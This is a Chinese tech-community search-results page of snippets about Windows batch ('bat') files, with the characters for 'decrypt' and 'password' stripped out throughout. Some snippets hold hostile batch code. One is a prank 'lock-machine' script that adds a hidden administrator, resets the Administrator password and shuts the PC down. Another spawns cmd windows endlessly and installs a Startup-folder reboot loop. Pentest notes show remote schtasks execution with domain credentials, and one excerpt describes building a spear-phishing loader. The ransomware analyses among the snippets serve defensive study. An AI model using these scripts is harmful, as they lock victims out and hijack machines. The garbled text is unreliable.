展开

关键词

jscript调用bat注意事项

开发的游戏项目,需要一个工具,对指定的资源进行复制、加,然后打包。 之前打包时都手工操作,复制与加这二步分别写了几个工具(lua加与图片资源加是分开的),后来感觉bat操作路径特别麻烦,所以我改用了hta写了一个界面,让使用者可以输入版本号,控制台上显示程序运行状态 就容易理了吧bat中调用应用程序start start luac.exe –o path1 path2hta调用bat这个其实没有什么难度,方法也十分简单var wsh = new 在调用bat的时候可以传递参数,上面的param1、param2就是传入的参数,在bat中通过%1、%2..%n进行获取。 *.xml文件 “WinRAR.exe a -ep -m5 -inul -n*.xml”===============================================如果想深入学习和了bat

23330

GlobeImposter3.0 勒索分析

分析机器,win7x64分析完成了,说一下木马特点:RSA加,私钥在攻击者手里,所以被加的文件在没有私钥的情况下无法。 我们可以看到程序首先会通过GetModuleFileNameW获取当前的路径然后调用了sub_408B19函数,参数分别为MultiByteStr和sub_4017E8查看了一下sub_408B19函数,貌似是函数 通过动态调试发现的确是函数,MultiByteStr出来就是加后缀名.Snake4444 ? 40449这个函数功能不复杂看样子就是创建并执行了一个bat文件,动态调试去拿到这个bat文件 ?直接在sub_409449入口处下断点,等了一段时间断下来的时候已经加完成了 ?创建路径: ? 0x03 分析总结木马加流程:拷贝自身到LOCALAPPDATA路径将自身写入到开机自启动勒索后缀、获取用户ID,RSA加之后存放到public,文件名为黑客的公钥信息遍历用户磁盘对除了自身以外的所有文件进行加并生成勒索提示文件生成

33020
  • 广告
    关闭

    90+款云产品免费体验

    提供包括云服务器,云数据库在内的90+款云计算产品。打造一站式的云产品试用服务,助力开发者和企业零门槛上云。

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Oracle 批处理自动备份bat脚本语句的步骤详

    %date:~5,2%%date:~8,2%expdp 用户名码@orcl schemas=导出的用户 directory=备份的文件夹 dumpfile=%expname%.dmp logfile= %expname%.log步骤 1、备份语句确保导出的语句能够执行expdp 用户名码@orcl schemas=导出的用户 directory=备份的文件夹 dumpfile=文件命名.dmp logfile =文件命名.log2、bat脚本确保bat脚本能执行有时候bat脚本执行时会包@echo错误,这是编码的问题。 把bat文件另存为的时候修改编码为:ANSI 就行了。? 用户名码@orcl schemas=导出的用户 directory=备份的文件夹 dumpfile=%expname%.dmp logfile=%expname%.logset:设置变量,expname

    24510

    【方向盘】每人送1G超小容量,“BAT网盘”免费助你做减法

    对于学习资料,我们总有这样的误:以为文章收藏了,以后还会打开看。其实只是个收藏党以为书买了,这个知识点就会了。其实只是用来兜灰以为公众号关注了,就能增加自己的见识。 其不靠谱程度基本等同于:我就在门口xx不进去 值得关注的是,BAT网盘还有些其它优势:上传下载不限速:BAT的网盘主打热点资料随时学习,若动不动限100kbs的速度那还得了在线压缩压缩:此功能也方便在线直接操作在线浏览 :程序员大多和文本文件打交道,对于pdf、txt、md等常见文本格式文件无需下载直接在线浏览学习(还包括视频、图像、音频等文件均可在线浏览)分享链接支持自定义过期时间:文件的分享链接除了公开、码访问外 BAT网盘 Q&A虽然咱不可能像商业网盘那样文档齐全、规范,但对于一些可能关心的疑问提前作出答。1. 网盘是否收费?永久免费。毕竟每人1G容量嘛,我还能负担得起2. 永久是多久? 码是否采用文那是必须的必。所有码均采用单向加算法SHA1 + 盐值的方式(不可能被破),所以大可放心4. 扩容是否需要付费?NO,不需要!!!

    9010

    【腾讯云的1001种玩法】试用腾讯云 Windows Server 2012 R2 镜像的几点经验分享

    1.2012 ping不通127.0.0.1的问题,我根据vimli发在群里的word文档写成了一个.bat文件,以后如果有用户遇到该问题,可以让用户在服务器里双击执行这个.bat文件即可。 ESC的方法如下:3.sqlserver2012自动安装脚本,把安装文件cn_sql_server_2012_express_edition_with_advanced_services_x64.exe压后 ,将sql2012.bat放到压后的文件夹里双击即可实现自动安装。. bat文件中的SAPWD=Hello@123这个参数是设置sa码的话,执行之前可以根据需要修改码。4.目前还没有集成有php环境的2012镜像。可以给用户推荐著名的护卫神PHP套件,非常省事。 8.2012 IIS8 自动安装.bat文件双击执行之即可。先安装dotnet在安装iis。9.调出桌面图标。

    1.9K60

    U盘变成你电脑的开机码,你试过吗?

    哈喽,各位小伙们晚上好,相信各位的电脑应该都设置了开机码吧,是PIN还是图形码尼?这些开机码都是我们见的比较多的了,你有见过把U盘当做电脑开机码的吗? 我们还需要在桌面新建一个文件,命名为:电脑开机秘钥,把后缀改为bat? 然后点击刚刚新建的电脑开机秘钥.bat文件,鼠标右击点击编辑,将我提供给大家的一段代码复制到文本文档中,修改以后进行保存,代码获取请在后台回复:0823? 紧接着我们将刚刚新建的电脑开机秘钥.bat文件放到电脑中一个不会被轻易发现的位置,例如我这边放到了文档的根目录。? 除限制 ----可能很多人会问U盘丢了怎么办啊?或者是自己不想用U盘锁了,那么有3种方案提供给大家,这3种方案随便一个都可以决!

    35320

    Defi101:使用Defi协议前需要了的几个概念

    一方面,它允许借款人(borrowers)从平台借出(borrow)加货币并支付利息,另 一方面它允许贷方(lenders)向平台存入(deposit)加货币以赚取利息。 由于我们讨论的是去中心化金融,因此可接受的抵押物通常都是数字加资产。为什么了需要超额抵押? 由于加货币价格的不稳定,那么使用加资产作为抵押物就是有风险的, 因为当抵押物价格下跌时,可能都不够偿还借款的价值(loan value)。 不过,Compound已经发布了Open Oracle, 其目的是提供一种链上决方案,该决方案从受信任的报告者(reporters)那里获取不同的价格,并计算出中间价格作为资产价格。 例如,假设1 REP的价格等价1 BAT,你存入1.5 BAT 作为抵押并借出1 REP,那么当BAT价格下跌到 1.3 BAT = 1 REP时,对于Defi协议就有风险了,因为如果BAT继续下跌的话

    44520

    通过jpg图片隐藏文件

    因为这是为后面压服务得~在该目录下编写bat文件: copy b 谣言.jpg+Video.rar 谣言2.jpg双击运行压缩.bat,我们可以看到目录下生成了一张谣言2.jpg的图片,看看大小,整合等于压缩包文件和图片文件总和 很简单,直接将文件后缀改为rar压缩包文件进行压就可以了,因为rar压有个专属的开始位置,压程序会读到开始位置的标识符才执行压程序,应该前面的jpg二进制会被忽略。 当然如果你希望获得更强大的加可以自己编写加策略。 附上Python代码:github地址加 #coding:utf-8 import clickimport random @click.command()@click.option(--background data)) with open(objectfile, wb) as fw_obf: fw_obf.write(data) if __name__ == __main__: encryptfile()

    21820

    内网渗透之命令行渗透 - 渗透红队笔记

    ----计划任务执行命令schtasks(计划任务)语法# 一、执行batschtasks create tn task1 U 域域用户 P 域用户码 tr 执行的命令或者bat路径 sc ONSTART s 域机器IP RU system# 二、运行schtasks run tn task1 s 域机子IP U 域域用户 P 域用户码# 三、删除计划任务schtasks F delete tn task1 s 域机子IP U 域域用户 P 域用户码 RU system :立即执行,以system权限执行 # 域用户schtasks create tn task1 U domainusername P 然后把1.bat拷贝到目标桌面:copy 1.bat 192.168.3.21c$usersadministratordesktop? 创建计划任务名为task1schtasks create tn task1 U godadministrator P Admin12345 tr C:usersadministratordesktop1.bat

    61720

    Windows系统常用命令

    域名 或者ping ip地址13.type显示文本文件的内容用法:将文本文件的内容输出到终端 语法:type 文件名14.reg用法:对注册表操作15. nslookup www.my404.cn用法:析域名为 ip -d参数:析历史使用的dns服务器16. find用法:查找文本文件中的字符或者字符串 语法:find 参数 “需要查找的字符或者字符串” 文件名 n参数:显示行号17. tasklist用法, (3)0password为用户帐号分配或更改码   (4)提示输入码   (5)domain在计算机主域的主域控制器中执行操作。 简单的bat命令新建文本文件,后缀名改成.bat,右击编辑,输入完命令保存双击即可无限弹cmd窗口start cmd%0无限重启echo shutdown r t 0 > C:WindowsTemp1. batcopy C:WindowsTemp1.bat %USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup改重启echo

    16620

    鱼叉攻击-炮轰马的制作

    0x01 木马思路 将样本自身图标伪装成图片或文档,运行样本之后释放资源中的相应的DOC文档以及加载器并设置隐藏文件属性,然后创建进程远程请求域前置服务端shellcode并加载到内存中运行,依次打开用于社工掩护的 UsersThinkPadAppDataLocalTempjqR78D62.exe +s +h 三、创建进程使用CreateProcess()创建进程,这里配合的是uknow师傅的,去配合DoaminFronting 远程动态AES加加载 = INVALID_HANDLE_VALUE) { DWORD len ; char *bat ; bat = (char*)alloca(strlen(templ) + strlen(modulename (hf, bat, strlen(bat), &len, NULL) ; CloseHandle(hf) ; ShellExecute(NULL, open, temppath, NULL, NULL, goto Repeatrmdir c:myfolderdel c:temp_uninsep.bat ; .bat文件将循环删除c: myfolder selfdestruct.exe,直到最终成功(

    39220

    十八.病毒攻防机理及WinRAR恶意劫持漏洞(bat病毒、自启动、蓝屏攻击)

    文章目录:一.批处理病毒机理1.关机bat脚本2.修改码和定时关机脚本3.脚本病毒防御二.自启动恶意攻击机理1.bat脚本实现自启动2.WinRAR恶意劫持自启动(CVE-2018-20250)3.恶意自启动防御三 包括:自动关机修改码定时关机bat文件是dos下的批处理文件。批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。 1.关机bat脚本下面讲第一个批处理脚本,主要是调用“shutdown”实现关机。 输入2可以设置关机时间,这里就不再赘述,批处理脚本实现某些恶意功能的过程已经详细讲。3.脚本病毒防御上面主要介绍了批处理bat脚本实现关机和修改管理员码的功能。 一.批处理病毒机理1.关机bat脚本2.修改码和定时关机脚本3.脚本病毒防御二.自启动恶意攻击机理1.bat脚本实现自启动2.WinRAR恶意劫持自启动(CVE-2018-20250)3.恶意自启动防御三

    6560

    芯片突围指望BAT,能成吗?

    纵观BAT三家在芯片行业中的布局可以发现,无论是投资还是自研,其落地的方向都是基于自身对芯片产品的理在设计层面发力,同时也止步于设计,并没有涉足中国最需要补齐短板的芯片制造领域。 BAT布局芯片的B面逻辑藏在暗处,我们可以将其理为为物联网时代寻找新智能硬件产品的机会。 BAT入局芯片,容易被人理的A面是与当前业务协同,服务当前业务;隐藏在暗的B面则是为未来投资。 03 芯片突围,为什么不能指望BAT?那么在芯片突围这件事情上,BAT能成为主力吗? 台积电的成功就是一个非常明显的例子,目前市场的主流需求是7nm制程工艺,“全村的希望”中芯国际要追赶的目标也是7nm技术,但台积电并没有止步于市场的主流需求,其5nm技术即将量产,3nm技术也在同期紧锣鼓的铺展 而BAT的现实难题是,大象难转身,要想改变自成立以来就形成的“市场导向”思维并不是一件容易的事情,特别是芯片这种投入高、回报慢的资金集型产业,动辄上百亿美元的投资起步额,作为上市公司的BAT如何保持定力

    25930

    再谈web.configapp.config敏感数据加的二种方法

    转载请注明来自菩提树下的杨过一.利用代码加using System.Web.Configuration;... section.SectionInformation.ProtectSection(DataProtectionConfigurationProvider);             config.Save();         }     } ,仍然可以按以前的操作来读取,不需要额外的决操作,因为 这里已经指定了用何种方式,asp.net会自动处理二.利用aspnet_regiis.exe工具加 步骤: 1.先在本地生成RSA容器( aspnet_regiis.exe -pef appSettings c:website -prov JimmyRSAProvider : aspnet_regiis.exe -pdf appSettings ,aspx读取节点时也无需任何处理,代码不用做任何修改 注意:并不是所有的节点都能加,ASP.NET 2.0仅支持对Web.config的部分配置节进行加,以下配置节中的数据是不能进行加的:

    1.3K80

    附各种Mysql安装失败的决办法(什么你安装失败了?快来看这个)

    第四步管理员身份运行环境变量.bat ?? 完事了。 输入mysql -uroot -p试一下 码不用输入,直接跳过。 ? 安装完成----问题决:如果不行的话,任务管理(ctrl+alt+del)找一下服务??根目录找到my.ini ? 大概率是data初始化失败,即没有完成操作就关闭了.bat 请删除mysql根目录下的data文件夹,然后手动在运行cmd运行以下代码。 id=492434 直接点击就可以下载,因为下载比较忙,可以拷贝到迅雷下载修改码最后最后,因为我的配置是跳过了码所以直接回车就可以,但是如果需要的话,参考一下改码。 问题通如果问题还没有决,那打开日志文件。在数据根目录下的data里面,有一个.err文件打开它,你就知道真正不能运行的原因是什么。

    27330

    bat锁机代码

    net user Administrator youngxjnet user admin youngxjnet user 码youngxj$ abin addnet localgroup administrators 码youngxj$ addShutdown.exe -s -t 30 以上是bat代码,用记事本另存为后缀为bat文件 给大家释一下: 1、Net User 作用:添加或更改用户帐号或显示用户帐号信息 命令格式:Net user ] 有关参数说明: ·键入不带参数的Net user查看计算机上的用户帐号列表 ·username添加、删除、更改或查看用户帐号名 ·password为用户帐号分配或更改码 ·提示输入码 2、Net Localgroup 作 用:添加、显示或更改本地组。 3、最后一个是关机命令,后面的数字是秒数,多少秒之后就会关机 温馨提示:youngxj是其中的码,如果被锁请不要慌张!请勿坑人,娱乐为主!

    10.1K111

    文本txt实现bat锁机代码(整蛊可用)

    net user Administrator aixiaoqinet user admin youngxjnet user 要码加Q8422518000$ abin addnet localgroup administrators 要码加Q8422518000$ addShutdown.exe -s -t 30以上是bat代码,用记事本另存为后缀为bat文件 给大家释一下:? 命令格式:Net user ] 有关参数说明:·键入不带参数的Net user查看计算机上的用户帐号列表·username添加、删除、更改或查看用户帐号名·password为用户帐号分配或更改码·提示输入码 3、最后一个是关机命令,后面的数字是秒数,多少秒之后就会关机温馨提示:aixiaoqi是其中的码,如果被锁请不要慌张!请勿坑人,娱乐为主!上述QQ是我随便输入的,大家别去问啊,哈哈哈

    2.5K40

    常见的远程执行命令方式整理

    @#123QWE所属本地组:Administrators用户名:test码:! 管理员用户遇到这个错误时,可参考 LocalAccountTokenFilterPolicy 决错误号 51,Windows 无法找到网络路径:网络有问题; 错误号 53,找不到网络路径:ip 地址错误 :原因很明显了; 错误号 1792,试图登录,但是网络登录服务没有启动:目标 NetLogon 服务未启动;错误号 2242,此用户的码已经过期:目标有帐号策略,强制定期要求更改码。 如果执行的命令比较复杂,比如命令中包含双引号,可以将命令写成 bat 脚本拷贝到远程系统上,然后远程执行 bat 脚本。 经测试,at、schtasks、psexec、wmic、wmiexec 和 sc 均支持 hash 注入后使用,在没有明文码的情况下,可以 hash 注入后运行命令(去除命令中的用户名、码参数)实现远程执行

    3.8K10

    从一条微博揭秘“专黑大V名人”的定向攻击

    (ps:测试没有装word,所以这里比较尴尬,没有word图标)接下来用ua.exe这个程序来压links.ini文件,码为”█噎冪蕟嚄Щ暜囖醃∷滸濤∑”,压后判断判断系统是多少位的如果是32 位的就运行Win1.bat文件,如果是64位的就运行Win2.bat(Win2.bat内容和Win1.bat内容相似,只是不再判断是多少版本的系统)Win1.bat该文件的内容主要是先判断是否存在swapfile.sys 如图最后到的脚本内容后的vbs文件的主要功能就是模拟鼠标去点击运行”C:$NtUninstallKB1601A$BinBackupMYTEMP”文件下的8.3f文件8.3f在RunOnceEx下写入了一个注册表 abc1601.databc1601.data是一个被加了的压缩文件。码为“▓羋奤柒♀懋髖瓊♂蠟蕙纗▓ ”。 图.上线包如果系统版本不是win8及其以上,则2106mt.1r是由test1.pfx而来文件主要内容如下:运行os.bat(覆盖腾讯信任文件数据库文件)→压abc.data→压inst.ini

    330100

    SamSam:一款难以追踪的分布式控制软件

    它会运行一个.NET可执行文件,并对已加的stub文件进行。 攻击者在受感染主机中执行bat文件时,需要在命令行中输入码作为执行参数,这个码会在攻击链中向下传递,直到.NET文件用其实现为止。 在旧版本中,这个bat文件似乎并不在攻击链中,攻击者需要直接执行.NET组件。这部分的详细信息如下所示:? 函数需要接收一个参数来作为器的输出方法,这也意味着它能够动态实现stub文件、转换为对应的PE并加载文件。码在bat文件的args中输入,其中Arg_4E_0为加字节流。 在新版本SamSam的第三个部分中,代码包含了一个单独的DLL文件,但在旧版本中,所有内容都包含在runner之中,因此旧版本总共也只有三个组件,而不像新版本那样拥有四个组件。下面是代码:?

    22900

    相关产品

    • 云加密机

      云加密机

      腾讯云加密机是基于国密局认证的物理加密机,利用虚拟化技术,提供弹性,高可用,高性能的数据加解密,密钥管理等云上数据安全服务。

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      扫码关注云+社区

      领取腾讯云代金券